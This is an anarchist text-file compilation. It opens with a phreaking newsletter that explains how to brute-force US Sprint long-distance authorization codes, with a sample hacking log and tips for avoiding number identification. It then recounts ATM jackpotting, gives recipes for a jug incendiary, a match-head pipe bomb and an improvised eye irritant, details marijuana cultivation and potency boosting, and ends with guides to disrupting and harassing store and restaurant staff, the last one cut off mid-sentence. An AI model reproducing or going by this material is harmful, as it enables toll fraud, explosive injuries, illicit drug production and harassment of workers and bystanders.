Underworld BBS's (Hack, Phreak, Card, Anarchy, etc.)
Hacking programs for Hayes compatables
Hacking programs for 1030/Xm301 modems
Modem scanners for Hayes compatables
Modem scanners for 1030/Xm301 modems
Other type illegal programs
You may add topics to the list if enough will support it.

Tid Bits

This will contain tips and helpful information sent in by the users.
If you have any information you wish to contribute, then put it in a text
file and upload it to one of the BBS's listed at the end of the
newsletter.
Please, no long distance codes, mainframe passwords, etc.
We may add other sections as time goes by.  This newsletter will not
be put out on a regular basis.  It will be put out when we have enough
articles and information to put in it.  There may be up to 5 a month, but
there will always be at least one a month.  We would like you, the readers,
to send us anything you feel would be of interest to others, like hacking
hints, methods of hacking long distance companies, companies to card from,
etc.  We will maintain the newsletter as long as the readers support it.
That is the end of the introduction, but take a look at this newsletter,
as it does contain information that may be of value to you.
==========================================================================
                      Hacking Sprint: The Easy Way
-------------------------------------------------------------------------
                             By: Tracker

If you hack US Sprint, 950-0777 (by the way it is no longer GTE
Sprint), and you are fustrated at hacking several hours only to find one
or two codes, then follow these tips, and it will increase your results
tremendously.  First, one thing that Mr. Mojo proved is that Sprint will
not store more than one code in every hundred numbers.  (ex: 98765400 to
98765499 may contain only one code).   There may NOT be a code in that
hundred, but there will never be more than one.
Sprint's 9 digit codes are stored from 500000000 through 999999999.
In the beginning of Sprint's 950 port, they only had 8 digit codes.  Then
they started converting to 9 digit codes, storing all 8 digit codes
between 10000000 and 49999999 and all 9 digit codes between 500000000 and
999999999.  Sprint has since cancelled most 8 digit codes, although there
are a few left that have been denoted as test codes.  Occaisionally, I
hear of phreaks saying they have 8 digit codes, but when verifying them,
the codes were invalid.
Now, where do you start?  You have already narrowed the low and high
numbers in half, therefore already increasing your chances of good results
by 50 percent.  The next step is to find a good prefix to hack.  By the
way, a prefix, in hacking terms, is the first digits in a code that can be
any length except the same number of digits the code is.  (ex: 123456789
is a code.  That means 1, 12, 123, 1234, 12345, 123456, 1234567, and
12345678 are prefixes)  The way you find a good prefix to hack is to
manually enter a code prefix.  If when you enter the code prefix and a
valid destination number and you do not hear the ringing of the recording
telling you that the code is invalid until near the end of the number,
then you know the prefix is valid.  Here is a chart to follow when doing
this:
Code      - Destination    Range good codes exist
-------------------------------------------------
123456789 - 6192R           123400000 - 123499999
123456789 - 619267R         123450000 - 123459999
123456789 - 61926702R       123456000 - 123456999
123456789 - 6192670293R     123456700 - 123456799
-------------------------------------------------
( R - Denotes when ring for recording starts)
To prove 
this true, I ran a test using OmniHack 1.3p, written by
Jolly Joe.  In this test I found a prefix where the last 3 digits were all
I had to hack.  I tested each hundred of the 6 digit prefix finding that
all but 4 had the ring start after the fourth digit was dialed in the
destination number.  The other four did not ring until I had finished the
entire code.  I set OmniHack to hack the prefix + 00 until prefix + 99.
(ex: xxxxxxy00 to xxxxxxy99: where y is one of the four numbers that the
ring did not start until the dialing was completed.)  Using this method, I
found four codes in a total of 241 attempts using ascending hacking (AKA:
Sequential).  Below you will see a record of my hack:
Range of hack            Codes found     Tries
----------------------------------------------
xxxxxx300 - xxxxxx399     xxxxxx350        50
xxxxxx500 - xxxxxx599     xxxxxx568        68
xxxxxx600 - xxxxxx699     xxxxxx646        46
xxxxxx800 - xxxxxx899     xxxxxx877        77
----------------------------------------------
Totals                     4 codes        241
As you see, these methods work.  Follow these guidlines and tips and
you should have an increase in production of codes in the future hacking
Sprint.  Also, if you have any hints/tips you think others could benefit
from, then type them up and upload them to one of the boards at the end of
the newsletter.
==========================================================================
                         Rumors: Why Spread Them?
--------------------------------------------------------------------------
                              By: Tracker
Do you ever get tired of hearing rumors?  You know, someone gets an
urge to impress others, so they create a rumor that some long distance
company is now using tracing equipment.  Why start rumors?  It only scares
others out of phreaking, and then makes you, the person who started the
rumor, look like Mr. Big.  This article is short, but it should make you
aware of the rumors that people spread for personal gain.  The best thing
to do is to denote them as a rumor starter and then leave it at that.  You
should not rag on them constantly, since if the other users cannot
determine if it is fact or rumor, then they should suffer the
consequences.
==========================================================================
                     The New Sprint FON Calling Cards
--------------------------------------------------------------------------
                               By: Tracker
US Sprint has opened up a new long distance network called the Fiber
Optic Network (FON), in which subscribers are given calling cards.  These
calling cards are 14 digits, and though, seem randomly generated, they are
actually encrypted.  The rumors floating around about people getting
caught using the Sprint FON calling cards are fact, not rumors.  The
reason people are getting caught is that they confuse the FON calling
cards with the local 950 port authorization codes.  If you will remember,
you never use AT&T calling cards from you home phone.  It has ANI
capability, which is not tracing, but rather the originating phone number
is placed on the bill as soon as the call is completed.  They know your
phone number when you call the 800 access port, but they do not record it
until your call is completed.  Also, through several of my hacks, I came
up with some interesting information surrounding the new Sprint network.
They are listed below.
800-877-0000
This number is for information on US Sprint's 800 calling card
service.  I have not played around with it, but I believe it is for
trouble or help with the FON calling cards.  I am not sure if it is for
subscribing to the FON network.
800-877-0002 - You hear a short tone, then nothing.
800-877-0003 - US Sprint Alpha Test Channel #1
800-877-(0004-0999)
When you call these numbers, you get a recording saying: "Welcome to
US Sprint's 1 plus service."  When the recording stops, if you hit the
pound key (#) you will get the calling card dial tone.
Other related Sprint numbers
800-521-4949   This is the number that you subscribe to US Sprint with.
You may also subscribe to the FON network on this number.  It will take 4
to 5 weeks for your calling card to arrive.
10777
This is US Sprint's equal access number.  When you dial this number,
you then dial the number you are calling, and it will be billed through US
Sprint, and you will receive their long distance line for that call.  Note
that you will be billed for calls made through equal access.  Do not
mistake it to be a method of phreaking, unless used from a remote
location.
If you are in US Sprint's 1+ service then call 1+700-555-1414, which
will tell you which long distance company you are using.  When you hear:
"Thank you for choosing US Sprint's 1 plus service," hit the pound key
(#), and then you will get the US Sprint dial tone.  This however is just
the same as if you are calling from your home phone if you dial direct, so
you would be billed for calls made through that, but there are ways to use
this to your advantage as in using equal access through a PBX.
==========================================================================
                   Automatic Number Identification (ANI)
--------------------------------------------------------------------------
                             By: Tracker

The true definition for Automatic Number Identification has not been
widely known to many.  Automatic Number Identification, (AKA: ANI), is the
process of the destination number knowing the originating number, which is
where you are calling from.  The method of achieving this is to send the
phone number that you are calling from in coded form ahead of the
destination number. Below is an example of this.
ANI Method
Dial: 267-0293
Sent: ********2670293
* - Denotes the originating number which is coded and sent before the
    number
As you noticed there are 8 digits in the coded number.  This is
because, at least I believe, it is stored in a binary-like form. 
Automatic Number Identification means a limited future in phreaking. ANI
does not threaten phreaking very much yet, but it will in the near future.
A new switching system will soon be installed in most cities that are
covered by ESS, Electronic Switching System, now. 
The system will have ANI capabilities which will be supplied to the
owners of phone lines as anadded extra.  The owner's phone will have
an LED read-out that will show the phone number of the people that
call you.  You will be able to block some numbers, so that people
cannot call you.  This system is in the testing stages currently, but will
soon be installed across most of the country.  As you see, this will
end a large part of phreaking, until we, the phreakers, can come up with
an alternative.  As I have been told by several, usually reliable,
people, this system is called ISS, which I am not sure of the meaning of
this, and is being tested currently in Rhode Island.
800 in-watts lines set up by AT&T support ANI.  The equipment to
decode an ANI coded origination number does not costs as much as you would
expect.  950 ports do not offer ANI capability, no matter what you have
been told.  The 950 ports will only give the city in which they are based,
this usually being the largest in the state, sometimes the capitol.
One last thing that I should tell you is that ANI is not related to
tracing.  Tracing can be done on any number whether local, 950, etc.  One
way around this, especially when dialing Alliance TeleConferencing, is to
dial through several extenders or ports.  ANI will only cover the number
that is calling it, and if you call through a number that does not support
ANI, then your number will never be known.
==========================================================================
                              The Disclaimer!
--------------------------------------------------------------------------

We, the editors, take no responsibility for your actions and use of
the information in this newsletter.  This newsletter is for informational
purposes only.  There will never be any long distance codes, passwords,
etc. in this newsletter.  If you are easily offended by telecommunication
discussions, then we suggest that you not read this newsletter.  But for
those who are truely interested in the information in this newsletter,
enjoy it.

Brought to you in Cookbook III, courtesy of the Jolly Roger!!!!!!!!!!

-Exodus-  Revised.


Jackpotting ATM Machines                courtesy of the Jolly Roger

JACKPOTTING was done rather successfully a while back in (you guessed it)
New York. What the culprits did was:
Sever (actually cross over) the line between the ATM and the
host. insert a microcomputer between the ATM and the host. insert
a fradulent card into the ATM.  (card=cash card, not hardware)
What the ATM did was: send a signal to the host, saying "Hey!  Can I
give this guy money, or is he broke, or is his card invalid?"
What the microcomputer did was: intercept the signal from the host,
discard it, send "there's no one using the ATM" signal.
What the host did was: get the "no one using" signal, send back "okay,
then for God's sake don't spit out any money!" signal to ATM.
What the microcomputer did was:
intercept signal (again), throw it away (again), send "Wow!  That
guy is like TOO rich!  Give him as much money as he wants.  In
fact, he's so loaded, give him ALL the cash we have!  He is
really a valued customer." signal.
What the ATM did:
what else?  Obediently dispense cash till the cows came home (or
very nearly so).
What the crooks got:
well in excess of $120,000 (for one weekend's work), and several
years when they were caught.
This story was used at a CRYPTOGRAPHY conference I attended a while
ago to demonstrate the need for better information security.  The
lines between ATM's & their hosts are usually 'weak' in the sense that
the information transmitted on them is generally not encrypted in any
way.  One of the ways that JACKPOTTING can be defeated is to encrypt
the information passing between the ATM and the host.  As long as the
key cannot be determined from the ciphertext, the transmission (and
hence the transaction) is secure.
A more believable, technically accurate story might concern a person
who uses a computer between the ATM and the host to determine the key
before actually fooling the host.  As everyone knows, people find
cryptanalysis a very exciting and engrossing subject...don't they?
(Hee-Hee)

_____             ______
|   |-<<-|   |-<<-|    |
|ATM|    micro    |Host|
|___|->>-|   |->>-|____|

The B of A ATM's are connected through dedicated lines to a host
computer as the Bishop said. However, for maintenance purposes, there
is at least one separate dial-up line also going to that same host
computer. This guy basically bs'ed his way over the phone till he
found someone stupid enough to give him th number. After finding that,
he had has Apple hack at the code. Simple.
Step 2: He had a friend go to an ATM with any B of A ATM card. He
stayed at home with the Apple connected to the host. When his friend
inserted the card, the host displayed it. The guy with the Apple
modified the status & number of the card directly in the host's
memory. He turned the card into a security card, used for testing
purposes. At that point, the ATM did whatever it's operator told it to
do.
The next day, he went into the bank with the $2000 he received,
talked to the manager and told him every detail of what he'd done. The
manager gave him his business card and told him that he had a job
waiting for him when he got out of school.
Now, B of A has been warned, they might have changed the system. On
the other hand, it'd be awful expensive to do that over the whole
country when only a handful of people have the resources and even less
have the intelligence to duplicate the feat. Who knows?

Jug Bomb                                        by the Jolly Roger

Take a glass jug, and put 3 to 4 drops of gasoline into it. Then put
the cap on, and swish the gas around so the inner surface of the jug
is coated.  Then add a few drops of potassium permanganate solution
into it and cap it.  To blow it up, either throw it at something, or
roll it at something.
                          ------------Exodus------------


Fun at K-Mart                                   by the Jolly Roger

Well, first off, one must realise the importance of K-Marts in
society today. First off, K-Marts provide things cheaper to those who
can't afford to shop at higher quality stores.  Although, all I ever
see in there is minorities and Senior Citizens, and the poor people in
our city.  Personally, I wouldn't be caught dead in there.  But, once,
I did.
You see, once, after The Moon Roach and Havoc Chaos(Dear friends of
mine) and I were exploring such fun things as rooftops, we came along
a K-Mart.  Amused, and cold for that matter, we wandered in.  The
Tension mounts.
As we walked up to the entrance, we were nearly attacked by Youth
Groups selling cheap cookies, and wheelchair sticken people selling
American Flags.  After laughing at these people, we entered. This is
where the real fun begins...
First, we wandered around the store, and turned on all the blue
lights we could find. That really distracts and confuses the
attendents...Fun to do...
The first neat thing, is to go to the section of the store where
they sell computers. Darkness engulf the earth the day they find Apple
Computers being sold there.  Instead, lesser computers like the
laughable C-64 can be found there...Turn it on, and make sure
nobody's looking...Then, once in Basic, type...

]10 PRINT "Fuck the world!  Anarchy Rules!" (or something to that
                                             effect.)
]20 GOTO 10 and walk away.

Also, set the sample radios in the store to a santanic rock station,
and turn the radio off.  Then, set the alarm for two minutes ahead of
the time displayed there.  Turn the volume up all the way, and walk
away.  After about two minutes, you will see the clerk feebly attempt
to turn the radio down or off.  It's really neat to set ten or more
radios to different stations, and walk away.
One of my favorite things to do, is to get onto the intercom system
of the store.  Easier typed then done.  First, check out the garden
department.  You say there's no attendent there? Good.  Sneak
carefully over to the phone behind the cheap counter there, and pick
it up.  Dial the number corrisponding to the item that says 'PAGE'...
And talk.  You will note that your voice will echo all over the bowels
of K-Mart.
I would suggest announcing something on the lines of: "Anarchy
rules!!"
                                 ------------Exodus-------------


Mace Substitute                                 by the Jolly Roger

3 PARTS: Alcohol
1/2 PARTS: Iodine
1/2 PARTS: Salt
Or:
3 PARTS: Alcohol
1 PARTS: Iodized Salt (Mortons)

It's not actual mace, but it does a damn good job on the eyes...

                     --------------Exodus


How to grow Marijuana                       courtesy of the Jolly Roger

                           MARIJUANA
Marijuana is a deciduous plant which grows from seeds. The fibrous section
of the plant was (has been replaced by synthetics) used to make rope.
The flowering tops, leaves, seeds, and resin of the plant is
used by just about everyone to get HIGH.
Normally, the vegetable parts of the plant are smoked to produce this
"high," but thay can also be eaten. The axtive ingredient in marijuana
resin is THC (tetahydrocannabinol). Marijuana contains from 1 - 4 per
cent THC (4 per cent must be considered GOOD dope).
Marijuana grows wild in many parts of the world, and is cultivated in
Mexice, Vietnam, Africa, Nepal, India, South America, etc.,etc. The
marijuana sold in the United States comes primarily from, yes, the
Uniited States.
It is estimated that at least 50 per cent of the grass on the streets
in America is homegrown. The next largest bunch comes actoss the
borders from Mexico, with smaller amounts filtering in from Panama,
occasionally South America, and occasinally, Africa.
Hashish is the pure resin of the marijuana plant, which is scraped from
the flowering tops of the plant and lumped together. Ganja is the
ground-up tops of the finest plants. (It is also the name given to any
sort of marijuana in Jamaica.)
Marijuana will deteriorate in about two years if exposed to light,
air or heat. It should always be stored in cool places.
Grass prices in the United States are a direct reflection of the laws
of supply and demand (and you thought that high school economics
would never be useful). A series of large border busts, a short growing
season, a bad crop, any number of things can drive the price of marijuana
up. Demand still seems to be on the increase in the U.S., so prices seldom
fall below last year's level.
Each year a small seasonal drought occurs, as last year's supply runs
low, and next year's crop is not up yet. Prices usually rase about
20 - 75 per cent during this time and then fall back to "normal."
Unquestionably, a large shortage of grass causes a percentage of smokers
to turn to harder drugs instead. For this reason, no grass control
program can ever be beneficial or "successful."
                                GROW IT!
There is one surefire way of avoiding high prices and the grass DT's:
Grow your own. This is not as difficult as some "authorities" on the
subject would make you believe. Marijuana is a weed, and a fairly
vivacious one at that, and it will grow almost in spite of you.
                               OUTDOORS
Contrary to propular belief, grass grows well in many place on the
North American continent. It will flourish even if the temperature does
not raise above 75 degrees.
The plants do need a minimum of eight hours of sunlight per day and
should be planted in late April/early May, BUT DEFINITELY, after the
last frost of the year.
Growing an outdoor, or "au naturel", crop has been the favored method
over the years, because grass seems to grow better without as much
attention when in its natural habitat.
Of course, an outdoors setting requires special precautions not encoun-
tered with an indoors crop; you must be able to avoid detection, both from
law enforcement freaks and common freaks, both of whom will take your
weed and probably use it. Of course, one will also arrest you. You must
also have access to the area to prepare the soil and harvest the crop.
There are two schools of thought about starting the seeds. One says you
should start the seedlings for about ten days in an indoor starter box
(see the indoor section) and then transplant. The other theory is that
you should just start them in the correct location. Fewer plants will
come up with this method, but there is no shock of transplant to
kill some of the seedlings halfway through.
The soil should be preprepared for the little devils by turning it
over a couple of times and adding about one cup of hydrated lime per
square yard of soil and a little bit (not too much, now) of good water
soluble nitrogen fertilizer. The soil should now be watered several
times and left to sit about one week.
The plants should be planted at least three feet apart, getting too
greedy and stacking them too close will result in stunted plants.
The plants like some water during their growing season, BUT not too
much. This is especially true around the roots, as too much water will
rot the root system.
Grass grows well in corn or hops, and these plants will help provide
some camouflage. It does not grow well with rye, spinach, or pepperweed.
It is probally a good idea to plant in many small, broken patches, as
people tend to notice patterns.
                       GENERAL GROWING INFO
Both the male and he female plant produce THC resin, although the male
is not as strong as the female. In a good crop, the male will still be
plenty smokable and should not be thrown away under any circumstances.
Marijuana can reach a hight of twenty feet (or would you rather wish on
a star) and obtain a diameter of 4 1/2 inches. If normal, it has a sex
ratio of about 1:1, but this can be altered in several ways.
The male plant dies in the 12th week of growing, the female will live
another 3 - 5 weeks to produce her younguns. Females can weigh twice as
much as males when they are mature.
Marijuana soil should compact when you squeeze it, but should also break
apart with a small pressure and absorb water well. A nice test
for either indoor or outdoor growing is to add a bunch of worms to the
soil, if they live and hang aroung, it is good soil, but if they don't,
well, change it. Worms also help keep the soil loose enough for the
plants to grow well.
                                SEEDS
To get good grass, you should start with the right seeds. A nice starting
point is to save the seeds form the best batch you have consumed. The
seeds should be virile, that is, they should not be grey and shiriveled
up, but green, meaty, and healthy appearing. A nice test is to drop the
seeds on a hot frying pan. If they "CRACK," they are probably good for
planting purposes.
The seeds should be soaked in distilled water overnight before planting.
BE SURE to plant in the ground with the pointy end UP. Plant about 1/2"
deep. Healthy seeds will sprout in about five days.
                             SPROUTING
The best all around sprouting method is probably to make a sprouting box
(as sold in nurseries) with a slated bottom or use paper cups with holes
punched in the bottoms. The sprouting soil should be a mixture of humus,
soil, and five sand with a bit of organic fertilizer and water mixed
in about one week before planting.
When ready to transplant, you must be sure and leave a ball of soil
around the roots of each plant. This whole ball is dropped into a
baseball-sized hold in the permanent soil.
If you are growing/transplanting indoors, you should use a green
safe light (purchased at nurseries) during the transplanting operation.
If you are transplanting outdoors, you should time it about two
hours befor sunset to avoid damage to the plant. Always wear cotton
gloves when handling the young plants.
After the plants are set in the hole, you should water them. It is also
a good idea to use a commercial transplant chemical (also purchased at
nurseries) to help then overcome the shock.
                          INDOOR GROWING
Indoor growing has many advantages, besides the apparent fact that it
is much harder to have your crop "found," you can control the ambient
conditions just exactly as you want them and get a guaranteed "good"
plant.
Plants grown indoors will not appear the same as their outdoor cousins.
They will be scrawnier appearing with a weak stems and may even require
you to tie them to a growing post to remain upright, BUT THEY WILL HAVE
AS MUCH OR MORE RESIN!
If growing in a room, you should put tar paper on the floors and then
buy sterilized bags of soil form a nursery. You will need about one
cubic foot of soil for eavh plant.
The plants will need about 150 ml. of water per plant/per week. They
will also need fresh air, so the room must be ventilated. (however,
the fresh air should contain NO TOBACCO smoke.)
At least eight hours of light a day must be provided. As you increase
the light, the plants grow faster and show more females/less males.
Sixteen hours of light per day seems to be the best combination, beyond
this makes little or no appreciable difference in the plant quality.
Another idea is to interrupt the night cycle with about one hour of
light. This gives you more females.
The walls of your growing room should be painted white or covered with
aluminum foil to reflect the light.
The lights themselves can be either bulbs of fluorescent. Figure about
75 watts per plant or one plant per two feet of flouresent tube.
The fluorescents are the best, but do not use "cool white" types. The
light sources should be an average of twenty inches from the
plant and NEVER closer than 14 inches. They may be mounted on a rack
 and moved every few days as the plants grow.
The very best light sources are those made by Sylvania and others
especially for growing plants (such as the "gro lux" types).
                       HARVESTING AND DRYING
The male plants will be taller and have about five green or yellow sepals,
which will split open to fertilize the female plant with pollen.
The female plant is shorter and has a small pistillate flower, which
really doesn't look like a flower at all but rather a small bunch of
leaves in a cluster.   
If you don't want any seeds, just good dope, you should pick the males
before they shed their pollen as the female will use some of her resin
to make the seeds.
After another three to five weeks, after the males are gone, the females
will begin to wither and die (from loneliness?), this is the time to pick.
In some nefarious Middle Eastren countries, farmers reportedly put their
beehives next to fiels of marijuana. The little devils collect the grass
pollen for their honey, which is supposed to contain a fair dosage
of THC.
The honey is then enjoyed by conventional methods or made into ambrosia.
If you want seeds - let the males shed his pollen then pick him. Let
the female go another month and pick her.
To cure the plants, they must be dried. On large crops, this is
accomplished by constructing a drying box or drying room.
You must have a heat source (such as an electric heater) which will make
the box/room each 130 degrees. The box/room must be ventilated
to carry off the water-vapor-laden air and replace it with fresh.
A good box can be constructed from an orange crate with fiberglass
insulated walls, vents in the tops, and screen shelves to hold the leaves.
There must be a baffle between the leaves and the heat source.
A quick cure for smaller amounts is to: cut the plant at the soil level
and wrap it in a cloth so as not to loose any leavs. Take out any seeds
by hand and store. Place all the leaves on a cookie sheet or aluminum
foil and put them in the middle sheld of the oven, which is set on "broil."
In a few seconds, the leaves will smoke and curl up, stir them around and
give another ten seconds before you take them out.
                    TO INCREASE THE GOOD STUFF
There are several tricks to increase the number of females, or the THC
content of plants:
You can make the plants mature in 36 days if you are in a hurry, by cutting
back on the light to about 14 hours, but the plants will not be as big.
You should gradually shorten the light cycle until you reach fourteen
hours.
You can stop any watering as the plants begin to bake the resin rise to
the flowers. This will increse the resin a bit.
You can use a sunlamp on the plants as they begin to develop flower stalks.
You can snip off the flower, right at the spot where it joins the plant,
and a new flower will form in a couple of weeks.
This can be repeated two or three times to get several times more flowers
than usual.
If the plants are sprayed with Ethrel early in their growing stage, they
will produce almost all female plants. This usually speeds up the flowering
also, it may happen in as little as two weeks.
You can employ a growth changer called colchicine. This is a bit hard to
get and expensive. (Should be ordered through a lab of some sort and
costs about $35 a gram.)
To use the colchicine, you should prepare your presoaking solution of
distilled water with about 0.10 per cent colchicine. This will cause
many of the seeds to die and not germinate, but the ones that do come
up will be polyploid plants. This is the accepted difference between
such strains as "gold" and normal grass, and yours will DEFINITELY
be superweed.
The problem here is that colchicine is a posion in larger quanities and
may be poisonous in the first generation of plants. Bill Frake, author
of CONNOISSEUR'S HANDBOOK OF MARIJUANA runs a very complete colchicine
treatment down and warns against smoking the first generation plants
(all succeeding generations will also be polyploid) bacause of this
poisonous quality.
However, the Medical Index shows colchicine being given in very small
quantities to people for treatment if various ailments. Although these
quantities are small, they would appear to be larger than any you could
recive form smoaking a seed-treated plant.
It would be a good idea to buy a copy of CONNOISSEUR'S, if you are planning
to attempt this, and read Mr. Drake's complete instructions.
Another still-experimental process to increase the resin it to pinch off
the leaf tips as soon as they appear from the time the plant is in the
seedling stage on through its entire life-span. This produces a distorted,
wrecked-looking plant which would be very difficuly to recognize as
marijuana. Of course, there is less substance to this plant, but such
wrecked creatures have been known to produve so much resin that it
crystallizes a strong hash all over the surface of the plant - might
be wise to try it on a plant or two and see what happens.
                        PLANT PROBLEM CHART
Always check the overall enviromental conditions prior to passing
judgment - soil aroung 7 pH or slightly less - plenty of water, light,
fresh air, loose soil, no water standing in pools.
        SYMPTOM                       PROBABLY PROBLEM/CURE
Larger leaves turning yellow -      Nitrogen dificiency - add
smaller leaves still green.         nitrate of soda or
                                    organic fertilizer.
Older leaves will curl at edges,    Phosphorsus dificiency -
turn dark, possibaly with a purple  add commercial phosphate.
cast.
Mature leaves develop a yellowish   Magnesium dificiency -
cast to least veinal areas.         add commercial fertilizer
                                    with a magnesium content.
Mature leaves turn yellow and then  Potassium dificiency -
become spotted with edge areas      add muriate of potash.
turning dark grey.
Cracked stems, no healthy support   Boron dificiency - add
tissue.                             any plant food containing
                                    boron.
Small wrinkled leaves with          Zinc dificiency - add
yelloish vein systems.              commercial plant food
                                    containing zinc.
Young leaves become deformed,       Molybedum dificiency -
possibaly yellowing.                use any plant food with a
                                    bit of molydbenum in it.
                         EXTRA SECTION:
                       BAD WEED/GOOD WEED
Can you turn bad weed into good weed? Surprisingly enough, the answer
to this oft-asked inquiry is, yes!
Like most other things in life, the amount of good you are going
to do relates directly to how much effort you are going to put into it.
There are no instant, supermarket products which you can spray on Kansas
catnip and have wonderweed, but there are a number of simplified,
inexpensive processes (Gee, Mr. Wizard!) thich will enhance mediocre
grass somewhat, ant there are a couple of fairly involved processes
which will do up even almost-parsley weed into something worth writing
home about.
                                   EASES
1. Place the dope in a container which allows air to enter in a restricted
fashion (such as a can with nail holes punched in its lid) and add a
bunch of dry ice, and the place the whold shebang in the freezer for a
few days. This process will add a certain amount of potency to the product,
however, this only works with dry ice, if you use normal, everyday
freezer ice, you will end up with a soggy mess...
2. Take a quantity of grass and dampen it, place in a baggie or another
socially acceptable container, and store it in a dark, dampish place
for a couple of weeks (burying it also seems to work). The grass will
develop a mold which tastes a bit harsh, a and burns a tiny bit funny,
but does increase the potency.
3. Expose the grass to the high intensity light of a sunlamp for a full
day or so. Personally, I don't feel that this is worth the effort, but
if you just spent $400 of your friend's money for this brick of
super-Colombian, right-from-the-President's-personal-stash,
and it turns out to be Missouri weed, and you're packing your bags to
leave town before the people arrive for their shares, well, you might
at least try it. Can't hurt.
4. Take the undisirable portions of our stash (stems, seeds, weak weed,
worms, etc.) and place them in a covered pot, with enough rubbing
alchol to cover everything.
Now CAREFULLY boil the mixture on an ELECTRIC stove or lab burner. DO
NOT USE GAS - the alchol is too flammable. After 45 minutes of heat,
remove the pot and strain the solids out, SAVING THE ALCOHOL.
Now, repeat the process with the same residuals, but fresh alchol.
When the second boil is over, remove the solids again, combine the two
quantities of alcohol and reboil until you have a syrupy mixture.
Now, this syrupy mixture will contain much of the THC formerly hidden
in the stems and such. One simply takes this syrup the throughly
combines it with the grass that one wishes to improve upon.
          SPECIAL SECTION ON RELATED SUBJECT MARYGIN:
Marygin is an anagram of the words marijuana and gin, as in Eli Whitney.
It is a plastic tumbler which acts much like a commercial cottin gin.
One takes about one ounce of an harb and breaks it up. This is then placed
in the Marygin and the protuding knod is roatated. This action turns
the internal wheel, which separates the grass from the debris (seeds,
stems).
It does not pulberize the grass as screens have a habit of doing and is
easily washable.
Marygin is available from:
     P.O. Box 5827
     Tuscon, Arizona 85703
     $5.00
     
     GRASS
     Edmund Scientific Company  
     555 Edscorp Building
     Barrington, New Jersy 08007
     Free Catalog is a wonder of good things for the potential grass
grower. They have an electric thermostat greenhouse for starting
plants for a mere $14.95.
Soil test kits for PH - $2.40
Al test - $9.95
Soil thermometer - $2.75
Lights which approzimate the true color balance of the sun and are
probably the most beneficial types available: 40 watt, 48 inch - 4 for
$15.75.
Indoor sun bulb, 75 or 150 watt - $5.75.
And, they have a natural growth regualtor for plants (Gibberellin) which
can change height, speed growth, and maturity, promote blossoming,
etc. Each plant reacts differently to treatment with Gibberellin...there's
no fun like experimenting - $2.00
                        SUGGESTED READING
THE CONNOISSEUR'S HANDBOOK OF MARIJUANA, Bill Drake
Straight Arrow Publishing - $3.50
625 Third Street
San Francisco, California

FLASH
P.O.Box 16098
San Fransicso, California 94116
Stocks a series of pamphlets on grass, dope manufacture, cooking.
Includes the Mary Jane Superweed series.


Match Head Bomb                                 by the Jolly Roger

Simple safety match heads in a pipe, capped at both ends, make a
devestating bomb. It is set off with a regular fuse.
A plastic Baggie is put into the pipe before the heads go in to
prevent detonation by contact with the metal.
Cutting enough match heads to fill the pipe can be tedious work for
one but an evening's fun for the family if you can drag them away from
the TV.
                           ------------Exodus----------



How To Terrorize McDonalds                       by the Jolly Roger
     (Originally an Apple ][ file so excuse the upper case!!!)

NOW, ALTHOUGH Mc DONALDS IS FAMOUS FOR IT'S ADVERTISING AND MAKING THE
WHOLE WORLD THINK THAT THE BIG MAC IS THE BEST THING TO COME ALONG SINCE
SLICED BREAD (BUNS?), EACH LITTLE RESTAURANT IS AS AMATEUR AND SIMPLE AS
A NEW-FOUND BUSNESS. NOT ONLY ARE ALL THE EMPLOYEES RATHER INEXPERIENCED
AT WHAT THEY'RE =SUPPOSED= TO DO, BUT THEY WILL JUST LOOSE ALL CONTROL WHEN
AN EMERGENCY OCCURS....HERE WE GO!!! FIRST, GET A FEW FRIENDS (4 IS
GOOD...I'LL GET TO THIS LATER) AND ENTER THE MCDONALDS RESTAURANT, TALKING
LOUDLY AND REAKING OF SOME STRANGE SMELL THAT AUTOMATICALLY MAKES THE OLD
COUPLE SITTING BY THE DOOR LEAVE. IF ONE OF THOSE PIMPLY-FACED GOONS IS
WIPING THE FLOOR, THEN TRACK SOME CRAP ALL OVER IT (YOU COULD PRETEND TO
SLIP AND BREAK YOUR HEAD, BUT YOU MIGHT ACTUALLY DO SO).
NEXT, BEFORE YOU GET THE FOOD, FIND A TABLE. START YELLING AND RELEASING
SOME STRANGE BODY ODOR SO =ANYBODY= WOULD LEAVE THEIR TABLE AND WALK OUT
THE DOOR. SIT 2 FRIENDS THERE, AND GO UP TO THE COUNTER WITH ANOTHER.
FIND A PLACE WHERE THE LINE IS SHORT, OR IF THE LINE IS LONG SAY "I ONLY
WANNA BUY A COKE" AND YOU GET MOVED UP. NOW, YOU GET TO DO THE =ORDERING=
...HEH HEH HEH. SOMEBODY =ALWAYS= MUST WANT A PLAIN
HAMBURGER WITH ABSOLUTELY NOTHING ON IT (THIS TAKES EXTRA TIME TO MAKE, AND
DRIVES THE LITTLE HAMBURGER-MAKERS INSANE)..ORDER A 9-PACK OF CHICKEN
MCNUGGETS...NO, A 20 PACK...NO, THREE 6 PACKS...WAIT...GO BACK TO THE TABLE
AND ASK WHO WANTS WHAT. YOUR OTHER FRIEND WAITS BY THE COUNTER AND MAKES A
PASS AT THE FEMALE CLERK. GET BACK TO THE THING AND ORDER THREE 6-PACKS OF
CHICKEN ETC....NOW SHE SAYS "WHAT KIND OF SAUCE WOULD YOU LIKE?".OF COURSE,
SAY THAT YOU ALL WANT BARBECUE SAUCE ONE OF YOUR FRIENDS WANTS 2 (ONLY IF
THERE ARE ONLY 2 CONTAINERS OF BARBECUE SAUCE LEFT).THEN THEY HAFTA GO INTO
THE STOREROOM AND OPEN UP ANOTHER BOX. FINALLY, THE DRINKS...SOMEBODY WANTS
COKE, SOMEBODY ROOT BEER, AND SOMEBODY DIET COKE. AFTER THESE ARE DELIVERED,
BRING THEM BACK AND SAY "I DIDN'T ORDER A DIET COKE! I ORDERED A SPRITE!"
THIS GETS THEM MAD; BETTER YET, TURN DOWN SOMETHING TERRIBLE THAT NOBODY
WANTS TO DRINK, SO THEY HAFTA THROW THE DRINK AWAY; THEY CAN'T SELL IT.
AFTER ALL THE FOOD(?) IS HANDED TO YOU, YOU MUST =NEVER= HAVE ENOUGH MONEY
TO PAY. THE CLERK WILL BE SO ANGRY AND CONFUSED THAT SHE'LL LET YA GET
AWAY WITH IT (ANOTHER INFLUENCE ON HER IS YOUR FRIEND ASKING HER "IF YOU
LET US GO I'LL GO OUT WITH YOU" AND GIVING HER A FAKE FONE NUMBER).
NOW, BACK TO YOUR TABLE. BUT FIRST, SOMEBODY LIKES KETCHUP AND MUSTARD.
AND PLENTY (TOO MUCH) OF NAPKINS. OH, AND SOMEBODY LIKES FORKS AND KNIVES,
